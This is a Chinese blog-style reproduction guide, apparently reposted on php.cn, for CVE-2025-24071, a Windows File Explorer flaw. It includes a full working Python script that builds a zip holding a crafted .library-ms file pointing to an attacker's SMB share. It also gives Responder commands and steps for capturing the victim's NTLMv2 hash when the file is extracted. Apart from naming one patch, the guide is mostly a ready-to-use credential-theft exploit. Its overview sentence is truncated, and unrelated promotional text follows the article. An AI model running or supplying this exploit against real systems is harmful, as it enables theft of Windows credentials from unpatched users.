0x00 前言
Windows 文件资源管理器(File Explorer)作为操作系统的关键组成部分,承担着管理本地与网络文件资源的核心任务。它提供用户友好的图形界面,支持对文件和文件夹进行创建、复制、移动、删除、重命名等基本操作,同时集成了网络共享访问、外部设备识别、文件搜索与过滤等高级功能,是日常多任务文件处理不可或缺的工具。
0x01 漏洞概述
当 Windows 资源管理器在解压含有特殊构造的
.library-ms
\\192.168.1.116\shared
0x02 漏洞验证过程
(1) 所需工具清单
Windows 主机(目标机器)IP: 192.168.2.11 Kali Linux 主机(攻击方)IP: 192.168.2.12 CVE-2025-24071 的利用脚本 a.py Kali Linux 上的中间人攻击工具 Responder
(2) 实际复现步骤
1、配置 Windows 主机 IP 地址为 192.168.2.11
2、设置 Kali Linux 的 IP 为 192.168.2.12
3、在 Kali 系统中启动 Responder 工具,执行命令:
sudo responder -I eth0 -v
4、运行 Python 脚本生成恶意压缩包,命令如下:
python a.py
a.py 脚本代码如下:
import os
import zipfile
def main():
file_name = input("Enter your file name: ")
ip_address = input("Enter IP (EX: 192.168.1.162): ")
library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<librarydescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchconnectordescriptionlist>
<searchconnectordescription>
<simplelocation>
<url>\\{ip_address}\shared</url>
</simplelocation>
</searchconnectordescription>
</searchconnectordescriptionlist>
</librarydescription>"""
library_file_name = f"{file_name}.library-ms"
with open(library_file_name, "w", encoding="utf-8") as f:
f.write(library_content)
with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
zipf.write(library_file_name)
if os.path.exists(library_file_name):
os.remove(library_file_name)
print("completed")
if __name__ == "__main__":
main()
5、将生成的 exploit.zip 文件传输至 Windows 系统并进行解压操作。
6、Kali Linux 成功捕获来自 Windows 的 NTLMv2 哈希凭证
0x03 修复方案
微软已发布补丁修复此漏洞,补丁编号为:KB5053606
0x04 参考资料
https://www.php.cn/link/f08f86e95c9d083c89f058285f9ff636
以上就是【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号